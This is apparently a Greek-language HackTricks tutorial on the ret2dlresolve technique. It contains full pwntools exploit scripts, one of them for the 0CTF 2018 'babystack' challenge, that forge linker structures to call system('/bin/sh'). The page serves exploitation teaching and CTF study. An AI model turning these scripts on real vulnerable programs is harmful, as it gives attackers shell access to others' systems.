Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.
Βασικές Πληροφορίες
Όπως εξηγείται στη σελίδα για το GOT/PLT και το Relro, τα δυαδικά χωρίς Full Relro θα επιλύουν σύμβολα (όπως διευθύνσεις προς εξωτερικές βιβλιοθήκες) την πρώτη φορά που χρησιμοποιούνται. Αυτή η επίλυση γίνεται καλώντας τη λειτουργία _dl_runtime_resolve.
Η λειτουργία _dl_runtime_resolve παίρνει από τη στοίβα αναφορές σε μερικές δομές που χρειάζεται για να επιλύσει το συγκεκριμένο σύμβολο.
Επομένως, είναι δυνατόν να πλαστογραφήσετε όλες αυτές τις δομές για να κάνετε τη δυναμική σύνδεση να επιλύσει το ζητούμενο σύμβολο (όπως η λειτουργία system) και να την καλέσετε με ρυθμισμένη παράμετρο (π.χ. system('/bin/sh')).
Συνήθως, όλες αυτές οι δομές πλαστογραφούνται κάνοντας μια αρχική ROP αλυσίδα που καλεί την read σε μια εγγράψιμη μνήμη, στη συνέχεια οι δομές και η συμβολοσειρά '/bin/sh' περνιούνται ώστε να αποθηκευτούν από την read σε μια γνωστή τοποθεσία, και στη συνέχεια η αλυσίδα ROP συνεχίζει καλώντας _dl_runtime_resolve, έχοντας τη δυνατότητα να επιλύσει τη διεύθυνση του system στις πλαστογραφημένες δομές και να καλέσει αυτήν τη διεύθυνση με τη διεύθυνση προς $'/bin/sh'.
Αυτή η τεχνική είναι χρήσιμη ειδικά αν δεν υπάρχουν gadgets syscall (για χρήση τεχνικών όπως το ret2syscall ή το SROP) και δεν υπάρχουν τρόποι διαρροής διευθύνσεων της libc.
Δείτε αυτό το βίντεο για μια ωραία εξήγηση σχετικά με αυτήν την τεχνική στο δεύτερο μισό του βίντεο:
Ή ελέγξτε αυτές τις σελίδες για μια εξήγηση βήμα προς βήμα:
context.binary = elf =ELF(pwnlib.data.elf.ret2dlresolve.get('amd64'))>>> rop =ROP(elf)>>> dlresolve =Ret2dlresolvePayload(elf, symbol="system", args=["echo pwned"])>>> rop.read(0, dlresolve.data_addr)# do not forget this step, but use whatever function you like>>> rop.ret2dlresolve(dlresolve)>>> raw_rop = rop.chain()>>>print(rop.dump())0x0000:0x400593 pop rdi; ret0x0008:0x0 [arg0] rdi =00x0010:0x400591 pop rsi; pop r15; ret0x0018:0x601e00 [arg1] rsi =62991360x0020:b'iaaajaaa'<pad r15>0x0028:0x4003f0 read0x0030:0x400593 pop rdi; ret0x0038:0x601e48 [arg0] rdi =62992080x0040:0x4003e0 [plt_init] system0x0048:0x15670 [dlresolve index]
Παράδειγμα
Καθαρό Pwntools
Μπορείτε να βρείτε ένα παράδειγμα αυτής της τεχνικής εδώπου περιέχει μια πολύ καλή εξήγηση της τελικής ROP αλυσίδας, αλλά εδώ είναι η τελική εκμετάλλευση που χρησιμοποιήθηκε:
from pwn import*elf = context.binary =ELF('./vuln', checksec=False)p = elf.process()rop =ROP(elf)# create the dlresolve objectdlresolve =Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])rop.raw('A'*76)rop.read(0, dlresolve.data_addr)# read to where we want to write the fake structuresrop.ret2dlresolve(dlresolve)# call .plt and dl-resolve() with the correct, calculated reloc_offsetlog.info(rop.dump())p.sendline(rop.chain())p.sendline(dlresolve.payload)# now the read is called and we pass all the relevant structures inp.interactive()
Ακατέργαστο
# Code from https://guyinatuxedo.github.io/18-ret2_csu_dl/0ctf18_babystack/index.html# This exploit is based off of: https://github.com/sajjadium/ctf-writeups/tree/master/0CTFQuals/2018/babystackfrom pwn import*target =process('./babystack')#gdb.attach(target)elf =ELF('babystack')# Establish starts of various sectionsbss =0x804a020dynstr =0x804822cdynsym =0x80481ccrelplt =0x80482b0# Establish two functionsscanInput =p32(0x804843b)resolve =p32(0x80482f0)#dlresolve address# Establish size of second payloadpayload1_size =43# Our first scan# This will call read to scan in our fake entries into the plt# Then return back to scanInput to re-exploit the bugpayload0 =""payload0 +="0"*44# Filler from start of input to return addresspayload0 +=p32(elf.symbols['read'])# Return readpayload0 += scanInput # After the read call, return to scan inputpayload0 +=p32(0)# Read via stdinpayload0 +=p32(bss)# Scan into the start of the bsspayload0 +=p32(payload1_size)# How much data to scan intarget.send(payload0)# Our second scan# This will be scanned into the start of the bss# It will contain the fake entries for our ret_2_dl_resolve attack# Calculate the r_info value# It will provide an index to our dynsym entrydynsym_offset = ((bss +0xc) - dynsym) /0x10r_info = (dynsym_offset <<8) |0x7# Calculate the offset from the start of dynstr section to our dynstr entrydynstr_index = (bss +28) - dynstrpaylaod1 =""# Our .rel.plt entrypaylaod1 +=p32(elf.got['alarm'])paylaod1 +=p32(r_info)# Emptypaylaod1 +=p32(0x0)# Our dynsm entrypaylaod1 +=p32(dynstr_index)paylaod1 +=p32(0xde)*3# Our dynstr entrypaylaod1 +="system\x00"# Store "/bin/sh" here so we can have a pointer ot itpaylaod1 +="/bin/sh\x00"target.send(paylaod1)# Our third scan, which will execute the ret_2_dl_resolve# This will just call 0x80482f0, which is responsible for calling the functions for resolving# We will pass it the `.rel.plt` index for our fake entry# As well as the arguments for system# Calculate address of "/bin/sh"binsh_bss_address = bss +35# Calculate the .rel.plt offsetret_plt_offset = bss - relpltpaylaod2 =""paylaod2 +="0"*44paylaod2 += resolve # 0x80482f0paylaod2 +=p32(ret_plt_offset)# .rel.plt offsetpaylaod2 +=p32(0xdeadbeef)# The next return address after 0x80482f0, really doesn't matter for uspaylaod2 +=p32(binsh_bss_address)# Our argument, address of "/bin/sh"target.send(paylaod2)# Enjoy the shell!target.interactive()
32bit, χωρίς relro, χωρίς canary, nx, χωρίς pie, βασική μικρή υπερχείλιση buffer και επιστροφή. Για να εκμεταλλευτείτε το bof χρησιμοποιείται για να καλέσει ξανά το read με ένα .bss τμήμα και μεγαλύτερο μέγεθος, για να αποθηκεύσει εκεί τους ψεύτικους πίνακες dlresolve για να φορτώσει το system, να επιστρέψει στο κύριο πρόγραμμα και να εκμεταλλευτεί ξανά το αρχικό bof για να καλέσει το dlresolve και μετά το system('/bin/sh').
